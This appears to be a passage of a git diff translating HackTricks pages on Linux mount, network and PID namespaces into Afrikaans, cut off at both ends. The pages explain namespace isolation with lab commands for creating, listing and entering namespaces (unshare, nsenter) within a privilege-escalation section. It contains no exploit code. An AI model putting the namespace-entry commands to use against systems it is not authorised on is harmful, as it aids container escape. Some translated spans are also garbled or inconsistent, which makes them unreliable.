+0x2fba9021 0 root 644 100 0 # From the host ipcs -m # Nothing is seen ``` - -## References +## Verwysings * [https://stackoverflow.com/questions/44666700/unshare-pid-bin-bash-fork-cannot-allocate-memory](https://stackoverflow.com/questions/44666700/unshare-pid-bin-bash-fork-cannot-allocate-memory)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
diff --git a/linux-hardening/privilege-escalation/docker-security/namespaces/mount-namespace.md b/linux-hardening/privilege-escalation/docker-security/namespaces/mount-namespace.md index b222577fc..a75895a2d 100644 --- a/linux-hardening/privilege-escalation/docker-security/namespaces/mount-namespace.md +++ b/linux-hardening/privilege-escalation/docker-security/namespaces/mount-namespace.md @@ -1,80 +1,82 @@ -# Mount Namespace +# Monteer Naamruimte
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Basic Information +## Basiese Inligting -A mount namespace is a Linux kernel feature that provides isolation of the file system mount points seen by a group of processes. Each mount namespace has its own set of file system mount points, and **changes to the mount points in one namespace do not affect other namespaces**. This means that processes running in different mount namespaces can have different views of the file system hierarchy. +'n Monteer-naamruimte is 'n Linux-kernelkenmerk wat isolasie van die lêerstelsel-monteerpunte wat deur 'n groep prosesse gesien word, bied. Elke monteer-naamruimte het sy eie stel lêerstelsel-monteerpunte, en **veranderings aan die monteerpunte in een naamruimte beïnvloed nie ander naamruimtes nie**. Dit beteken dat prosesse wat in verskillende monteer-naamruimtes loop, verskillende sienings van die lêerstelsel-hierargie kan hê. -Mount namespaces are particularly useful in containerization, where each container should have its own file system and configuration, isolated from other containers and the host system. +Monteer-naamruimtes is veral nuttig in konteinerisering, waar elke konteiner sy eie lêerstelsel en konfigurasie moet hê, geïsoleer van ander konteinere en die gasheerstelsel. -### How it works: +### Hoe dit werk: -1. When a new mount namespace is created, it is initialized with a **copy of the mount points from its parent namespace**. This means that, at creation, the new namespace shares the same view of the file system as its parent. However, any subsequent changes to the mount points within the namespace will not affect the parent or other namespaces. -2. When a process modifies a mount point within its namespace, such as mounting or unmounting a file system, the **change is local to that namespace** and does not affect other namespaces. This allows each namespace to have its own independent file system hierarchy. -3. Processes can move between namespaces using the `setns()` system call, or create new namespaces using the `unshare()` or `clone()` system calls with the `CLONE_NEWNS` flag. When a process moves to a new namespace or creates one, it will start using the mount points associated with that namespace. -4. **File descriptors and inodes are shared across namespaces**, meaning that if a process in one namespace has an open file descriptor pointing to a file, it can **pass that file descriptor** to a process in another namespace, and **both processes will access the same file**. However, the file's path may not be the same in both namespaces due to differences in mount points. +1. Wanneer 'n nuwe monteer-naamruimte geskep word, word dit geïnisialiseer met 'n **kopie van die monteerpunte van sy ouer-naamruimte**. Dit beteken dat, by skepping, die nuwe naamruimte dieselfde siening van die lêerstelsel deel as sy ouer. Tog sal enige volgende veranderinge aan die monteerpunte binne die naamruimte nie die ouer of ander naamruimtes beïnvloed nie. +2. Wanneer 'n proses 'n monteerpunt binne sy naamruimte wysig, soos die monteer of ontmonteer van 'n lêerstelsel, is die **verandering plaaslik in daardie naamruimte** en beïnvloed dit nie ander naamruimtes nie. Dit maak dit moontlik dat elke naamruimte sy eie onafhanklike lêerstelsel-hierargie het. +3. Prosesse kan tussen naamruimtes beweeg deur die `setns()`-sisteemaanroep te gebruik, of nuwe naamruimtes skep deur die `unshare()`- of `clone()`-sisteemaanroep met die `CLONE_NEWNS`-vlag te gebruik. Wanneer 'n proses na 'n nuwe naamruimte beweeg of een skep, sal dit begin om die monteerpunte wat met daardie naamruimte geassosieer word, te gebruik. +4. **Lêerbeskrywers en inodes word oor naamruimtes gedeel**, wat beteken dat as 'n proses in een naamruimte 'n oop lêerbeskrywer het wat na 'n lêer wys, kan dit **daardie lêerbeskrywer** aan 'n proses in 'n ander naamruimte oordra, en **beide prosesse sal toegang tot dieselfde lêer hê**. Die lêer se pad mag egter nie dieselfde wees in beide naamruimtes as gevolg van verskille in monteerpunte nie. -## Lab: +## Laboratorium: -### Create different Namespaces +### Skep verskillende Naamruimtes #### CLI - ```bash sudo unshare -m [--mount-proc] /bin/bash ``` - -By mounting a new instance of the `/proc` filesystem if you use the param `--mount-proc`, you ensure that the new mount namespace has an **accurate and isolated view of the process information specific to that namespace**. +Deur 'n nuwe instansie van die `/proc`-lêersisteem te monteer as jy die parameter `--mount-proc` gebruik, verseker jy dat die nuwe berg-namespace 'n **akkurate en geïsoleerde siening van die prosesinligting spesifiek vir daardie namespace** het.
-Error: bash: fork: Cannot allocate memory +Fout: bash: fork: Kan nie geheue toewys nie -When `unshare` is executed without the `-f` option, an error is encountered due to the way Linux handles new PID (Process ID) namespaces. The key details and the solution are outlined below: +Wanneer `unshare` uitgevoer word sonder die `-f`-opsie, word 'n fout aangetref as gevolg van die manier waarop Linux nuwe PID (Proses-ID)-namespaces hanteer. Die sleuteldetails en die oplossing word hieronder uiteengesit: -1. **Problem Explanation**: - - The Linux kernel allows a process to create new namespaces using the `unshare` system call. However, the process that initiates the creation of a new PID namespace (referred to as the "unshare" process) does not enter the new namespace; only its child processes do. - - Running `%unshare -p /bin/bash%` starts `/bin/bash` in the same process as `unshare`. Consequently, `/bin/bash` and its child processes are in the original PID namespace. - - The first child process of `/bin/bash` in the new namespace becomes PID 1. When this process exits, it triggers the cleanup of the namespace if there are no other processes, as PID 1 has the special role of adopting orphan processes. The Linux kernel will then disable PID allocation in that namespace. +1. **Probleemverduideliking**: +- Die Linux-kernel maak dit moontlik vir 'n proses om nuwe namespaces te skep deur die `unshare`-sisteemaanroep te gebruik. Die proses wat die skepping van 'n nuwe PID-namespace inisieer (bekend as die "unshare"-proses) betree egter nie die nuwe namespace nie; slegs sy kinderprosesse doen dit. +- Die uitvoering van `%unshare -p /bin/bash%` begin `/bin/bash` in dieselfde proses as `unshare`. Gevolglik is `/bin/bash` en sy kinderprosesse in die oorspronklike PID-namespace. +- Die eerste kinderproses van `/bin/bash` in die nuwe namespace word PID 1. Wanneer hierdie proses afsluit, veroorsaak dit die skoonmaak van die namespace as daar geen ander prosesse is nie, aangesien PID 1 die spesiale rol het om weesouerprosesse aan te neem. Die Linux-kernel sal dan PID-toekenning in daardie namespace deaktiveer. -2. **Consequence**: - - The exit of PID 1 in a new namespace leads to the cleaning of the `PIDNS_HASH_ADDING` flag. This results in the `alloc_pid` function failing to allocate a new PID when creating a new process, producing the "Cannot allocate memory" error. +2. **Gevolg**: +- Die afsluiting van PID 1 in 'n nuwe namespace lei tot die skoonmaak van die `PIDNS_HASH_ADDING`-vlag. Dit veroorsaak dat die `alloc_pid`-funksie misluk om 'n nuwe PID toe te ken wanneer 'n nuwe proses geskep word, wat die "Kan nie geheue toewys nie" -fout veroorsaak. -3. **Solution**: - - The issue can be resolved by using the `-f` option with `unshare`. This option makes `unshare` fork a new process after creating the new PID namespace. - - Executing `%unshare -fp /bin/bash%` ensures that the `unshare` command itself becomes PID 1 in the new namespace. `/bin/bash` and its child processes are then safely contained within this new namespace, preventing the premature exit of PID 1 and allowing normal PID allocation. +3. **Oplossing**: +- Die probleem kan opgelos word deur die `-f`-opsie saam met `unshare` te gebruik. Hierdie opsie maak `unshare` 'n nuwe proses na die skepping van die nuwe PID-namespace. +- Deur `%unshare -fp /bin/bash%` uit te voer, verseker jy dat die `unshare`-opdrag self PID 1 in die nuwe namespace word. `/bin/bash` en sy kinderprosesse word dan veilig binne hierdie nuwe namespace gehou, wat die voortydige afsluiting van PID 1 voorkom en normale PID-toekenning moontlik maak. -By ensuring that `unshare` runs with the `-f` flag, the new PID namespace is correctly maintained, allowing `/bin/bash` and its sub-processes to operate without encountering the memory allocation error. +Deur te verseker dat `unshare` met die `-f`-vlag uitgevoer word, word die nuwe PID-namespace korrek onderhou, sodat `/bin/bash` en sy subprosesse kan werk sonder om die geheue-toewysingsfout te ondervind.
#### Docker - ```bash docker run -ti --name ubuntu1 -v /usr:/ubuntu1 ubuntu bash ``` +### Kyk watter namespace jou proses in is -### Check which namespace is your process in +Om te bepaal in watter namespace jou proses tans is, kan jy die volgende opdrag gebruik: +```bash +cat /proc/$$/mountinfo | grep "ns" +``` + +Hierdie opdrag sal die `mountinfo`-lêer van jou huidige proses (`$$`) lees en die reëls filter wat die woord "ns" bevat. Die uitset sal die namespace-identifiseerders vir jou proses toon. ```bash ls -l /proc/self/ns/mnt lrwxrwxrwx 1 root root 0 Apr 4 20:30 /proc/self/ns/mnt -> 'mnt:[4026531841]' ``` - -### Find all Mount namespaces +### Vind alle Monteer-ruimtes {% code overflow="wrap" %} ```bash @@ -82,20 +84,19 @@ sudo find /proc -maxdepth 3 -type l -name mnt -exec readlink {} \; 2>/dev/null | # Find the processes with an specific namespace sudo find /proc -maxdepth 3 -type l -name mnt -exec ls -l {} \; 2>/dev/null | grep ``` +{% code %} + +### Betree binne 'n Monteer-namespace + {% endcode %} - -### Enter inside a Mount namespace - ```bash nsenter -m TARGET_PID --pid /bin/bash ``` +Verder kan jy slegs **toegang verkry tot 'n ander proses-namespace as jy root is**. En jy kan **nie** **toegang verkry** tot 'n ander namespace **sonder 'n beskrywer** wat daarna verwys nie (soos `/proc/self/ns/mnt`). -Also, you can only **enter in another process namespace if you are root**. And you **cannot** **enter** in other namespace **without a descriptor** pointing to it (like `/proc/self/ns/mnt`). - -Because new mounts are only accessible within the namespace it's possible that a namespace contains sensitive information that can only be accessible from it. - -### Mount something +Omdat nuwe bergings slegs binne die namespace toeganklik is, is dit moontlik dat 'n namespace sensitiewe inligting bevat wat slegs daarvandaan toeganklik is. +### Monteer iets ```bash # Generate new mount ns unshare -m /bin/bash @@ -109,21 +110,20 @@ ls /tmp/mount_ns_example/test # Exists mount | grep tmpfs # Cannot see "tmpfs on /tmp/mount_ns_example" ls /tmp/mount_ns_example/test # Doesn't exist ``` - -## References +## Verwysings * [https://stackoverflow.com/questions/44666700/unshare-pid-bin-bash-fork-cannot-allocate-memory](https://stackoverflow.com/questions/44666700/unshare-pid-bin-bash-fork-cannot-allocate-memory)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
diff --git a/linux-hardening/privilege-escalation/docker-security/namespaces/network-namespace.md b/linux-hardening/privilege-escalation/docker-security/namespaces/network-namespace.md index 38001fd29..b2c58af59 100644 --- a/linux-hardening/privilege-escalation/docker-security/namespaces/network-namespace.md +++ b/linux-hardening/privilege-escalation/docker-security/namespaces/network-namespace.md @@ -1,80 +1,91 @@ -# Network Namespace +# Netwerk-namespace
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PRs in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Basic Information +## Basiese Inligting -A network namespace is a Linux kernel feature that provides isolation of the network stack, allowing **each network namespace to have its own independent network configuration**, interfaces, IP addresses, routing tables, and firewall rules. This isolation is useful in various scenarios, such as containerization, where each container should have its own network configuration, independent of other containers and the host system. +'n Netwerk-namespace is 'n Linux-kernelkenmerk wat isolasie van die netwerkstapel bied, wat **elke netwerk-namespace in staat stel om sy eie onafhanklike netwerk-konfigurasie**, koppelvlakke, IP-adresse, roetetabelle en vuremuur-reëls te hê. Hierdie isolasie is nuttig in verskeie scenario's, soos konteinerisasie, waar elke konteiner sy eie netwerk-konfigurasie moet hê, onafhanklik van ander konteinere en die gasheerstelsel. -### How it works: +### Hoe dit werk: -1. When a new network namespace is created, it starts with a **completely isolated network stack**, with **no network interfaces** except for the loopback interface (lo). This means that processes running in the new network namespace cannot communicate with processes in other namespaces or the host system by default. -2. **Virtual network interfaces**, such as veth pairs, can be created and moved between network namespaces. This allows for establishing network connectivity between namespaces or between a namespace and the host system. For example, one end of a veth pair can be placed in a container's network namespace, and the other end can be connected to a **bridge** or another network interface in the host namespace, providing network connectivity to the container. -3. Network interfaces within a namespace can have their **own IP addresses, routing tables, and firewall rules**, independent of other namespaces. This allows processes in different network namespaces to have different network configurations and operate as if they are running on separate networked systems. -4. Processes can move between namespaces using the `setns()` system call, or create new namespaces using the `unshare()` or `clone()` system calls with the `CLONE_NEWNET` flag. When a process moves to a new namespace or creates one, it will start using the network configuration and interfaces associated with that namespace. +1. Wanneer 'n nuwe netwerk-namespace geskep word, begin dit met 'n **volledig geïsoleerde netwerkstapel**, met **geen netwerkkoppelvlakke** behalwe die lusback-koppelvlak (lo). Dit beteken dat prosesse wat in die nuwe netwerk-namespace loop, nie standaard kan kommunikeer met prosesse in ander namespaces of die gasheerstelsel nie. +2. **Virtuele netwerkkoppelvlakke**, soos veth-pare, kan geskep word en tussen netwerk-namespaces geskuif word. Dit maak dit moontlik om netwerkverbinding tussen namespaces of tussen 'n namespace en die gasheerstelsel te vestig. Byvoorbeeld, een einde van 'n veth-paar kan in 'n konteiner se netwerk-namespace geplaas word, en die ander einde kan aangesluit word op 'n **brug** of 'n ander netwerkkoppelvlak in die gasheer-namespace, wat netwerkverbinding aan die konteiner bied. +3. Netwerkkoppelvlakke binne 'n namespace kan hul **eie IP-adresse, roetetabelle en vuremuur-reëls** hê, onafhanklik van ander namespaces. Dit maak dit moontlik vir prosesse in verskillende netwerk-namespaces om verskillende netwerk-konfigurasies te hê en te werk asof hulle op afsonderlike netwerkstelsels loop. +4. Prosesse kan tussen namespaces beweeg deur die `setns()`-sisteemaanroep te gebruik, of nuwe namespaces kan geskep word deur die `unshare()`- of `clone()`-sisteemaanroep met die `CLONE_NEWNET`-vlag te gebruik. Wanneer 'n proses na 'n nuwe namespace beweeg of een skep, sal dit begin om die netwerk-konfigurasie en koppelvlakke wat met daardie namespace geassosieer is, te gebruik. -## Lab: +## Laboratorium: -### Create different Namespaces +### Skep verskillende Namespaces #### CLI - ```bash sudo unshare -n [--mount-proc] /bin/bash # Run ifconfig or ip -a ``` - -By mounting a new instance of the `/proc` filesystem if you use the param `--mount-proc`, you ensure that the new mount namespace has an **accurate and isolated view of the process information specific to that namespace**. +Deur 'n nuwe instansie van die `/proc`-lêersisteem te monteer as jy die parameter `--mount-proc` gebruik, verseker jy dat die nuwe berg-namespace 'n **akkurate en geïsoleerde siening van die prosesinligting spesifiek vir daardie namespace** het.
-Error: bash: fork: Cannot allocate memory +Fout: bash: fork: Kan nie geheue toewys nie -When `unshare` is executed without the `-f` option, an error is encountered due to the way Linux handles new PID (Process ID) namespaces. The key details and the solution are outlined below: +Wanneer `unshare` uitgevoer word sonder die `-f`-opsie, word 'n fout aangetref as gevolg van die manier waarop Linux nuwe PID (Proses-ID) namespaces hanteer. Die sleuteldetails en die oplossing word hieronder uiteengesit: -1. **Problem Explanation**: - - The Linux kernel allows a process to create new namespaces using the `unshare` system call. However, the process that initiates the creation of a new PID namespace (referred to as the "unshare" process) does not enter the new namespace; only its child processes do. - - Running `%unshare -p /bin/bash%` starts `/bin/bash` in the same process as `unshare`. Consequently, `/bin/bash` and its child processes are in the original PID namespace. - - The first child process of `/bin/bash` in the new namespace becomes PID 1. When this process exits, it triggers the cleanup of the namespace if there are no other processes, as PID 1 has the special role of adopting orphan processes. The Linux kernel will then disable PID allocation in that namespace. +1. **Probleemverduideliking**: +- Die Linux-kernel maak dit moontlik vir 'n proses om nuwe namespaces te skep deur die `unshare`-stelseloproep te gebruik. Die proses wat die skepping van 'n nuwe PID-namespace inisieer (bekend as die "unshare"-proses) betree egter nie die nuwe namespace nie; slegs sy kinderprosesse doen dit. +- Die uitvoering van `%unshare -p /bin/bash%` begin `/bin/bash` in dieselfde proses as `unshare`. Gevolglik is `/bin/bash` en sy kinderprosesse in die oorspronklike PID-namespace. +- Die eerste kinderproses van `/bin/bash` in die nuwe namespace word PID 1. Wanneer hierdie proses afsluit, veroorsaak dit die skoonmaak van die namespace as daar geen ander prosesse is nie, aangesien PID 1 die spesiale rol het om weeskindprosesse aan te neem. Die Linux-kernel sal dan PID-toekenning in daardie namespace deaktiveer. -2. **Consequence**: - - The exit of PID 1 in a new namespace leads to the cleaning of the `PIDNS_HASH_ADDING` flag. This results in the `alloc_pid` function failing to allocate a new PID when creating a new process, producing the "Cannot allocate memory" error. +2. **Gevolg**: +- Die afsluiting van PID 1 in 'n nuwe namespace lei tot die skoonmaak van die `PIDNS_HASH_ADDING`-vlag. Dit veroorsaak dat die `alloc_pid`-funksie misluk om 'n nuwe PID toe te ken wanneer 'n nuwe proses geskep word, wat die "Kan nie geheue toewys nie" -fout veroorsaak. -3. **Solution**: - - The issue can be resolved by using the `-f` option with `unshare`. This option makes `unshare` fork a new process after creating the new PID namespace. - - Executing `%unshare -fp /bin/bash%` ensures that the `unshare` command itself becomes PID 1 in the new namespace. `/bin/bash` and its child processes are then safely contained within this new namespace, preventing the premature exit of PID 1 and allowing normal PID allocation. +3. **Oplossing**: +- Die probleem kan opgelos word deur die `-f`-opsie saam met `unshare` te gebruik. Hierdie opsie maak `unshare` 'n nuwe proses na die skepping van die nuwe PID-namespace. +- Deur `%unshare -fp /bin/bash%` uit te voer, verseker jy dat die `unshare`-opdrag self PID 1 in die nuwe namespace word. `/bin/bash` en sy kinderprosesse word dan veilig binne hierdie nuwe namespace gehou, wat die voortydige afsluiting van PID 1 voorkom en normale PID-toekenning moontlik maak. -By ensuring that `unshare` runs with the `-f` flag, the new PID namespace is correctly maintained, allowing `/bin/bash` and its sub-processes to operate without encountering the memory allocation error. +Deur te verseker dat `unshare` met die `-f`-vlag uitgevoer word, word die nuwe PID-namespace korrek onderhou, sodat `/bin/bash` en sy subprosesse kan werk sonder om die geheue-toewysingsfout te ondervind.
#### Docker - ```bash docker run -ti --name ubuntu1 -v /usr:/ubuntu1 ubuntu bash # Run ifconfig or ip -a ``` +### Kyk watter namespace jou proses in is -### Check which namespace is your process in +Om te bepaal in watter namespace jou proses tans is, kan jy die volgende opdrag gebruik: +```bash +ls -l /proc/$$/ns +``` + +Hier is die betekenis van die vlags in die uitset: + +- `mnt`: Die bergingsnamespace +- `pid`: Die prosesnamespace +- `net`: Die netwerknamespace +- `ipc`: Die interproseskommunikasienamespace +- `uts`: Die stelselidentiteitsnamespace +- `user`: Die gebruikersnamespace + +As jy die uitset van die opdrag sien, kan jy bepaal in watter namespace jou proses tans is deur te kyk na die simboliese skakels wat na die aktiewe namespaces verwys. ```bash ls -l /proc/self/ns/net lrwxrwxrwx 1 root root 0 Apr 4 20:30 /proc/self/ns/net -> 'net:[4026531840]' ``` - -### Find all Network namespaces +### Vind alle Netwerk namespaces {% code overflow="wrap" %} ```bash @@ -82,29 +93,29 @@ sudo find /proc -maxdepth 3 -type l -name net -exec readlink {} \; 2>/dev/null | # Find the processes with an specific namespace sudo find /proc -maxdepth 3 -type l -name net -exec ls -l {} \; 2>/dev/null | grep ``` +{% code %} + +### Betree 'n Netwerk-namespace + {% endcode %} - -### Enter inside a Network namespace - ```bash nsenter -n TARGET_PID --pid /bin/bash ``` +Verder kan jy slegs **toegang verkry tot 'n ander proses-namespace as jy root is**. En jy **kan nie** **toegang kry** tot 'n ander namespace **sonder 'n beskrywer** wat daarna verwys nie (soos `/proc/self/ns/net`). -Also, you can only **enter in another process namespace if you are root**. And you **cannot** **enter** in other namespace **without a descriptor** pointing to it (like `/proc/self/ns/net`). - -## References +## Verwysings * [https://stackoverflow.com/questions/44666700/unshare-pid-bin-bash-fork-cannot-allocate-memory](https://stackoverflow.com/questions/44666700/unshare-pid-bin-bash-fork-cannot-allocate-memory)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hack-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
diff --git a/linux-hardening/privilege-escalation/docker-security/namespaces/pid-namespace.md b/linux-hardening/privilege-escalation/docker-security/namespaces/pid-namespace.md index 60b5fec57..cc62c92a6 100644 --- a/linux-hardening/privilege-escalation/docker-security/namespaces/pid-namespace.md +++ b/linux-hardening/privilege-escalation/docker-security/namespaces/pid-namespace.md @@ -1,82 +1,84 @@ -# PID Namespace +# PID Naamruimte
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 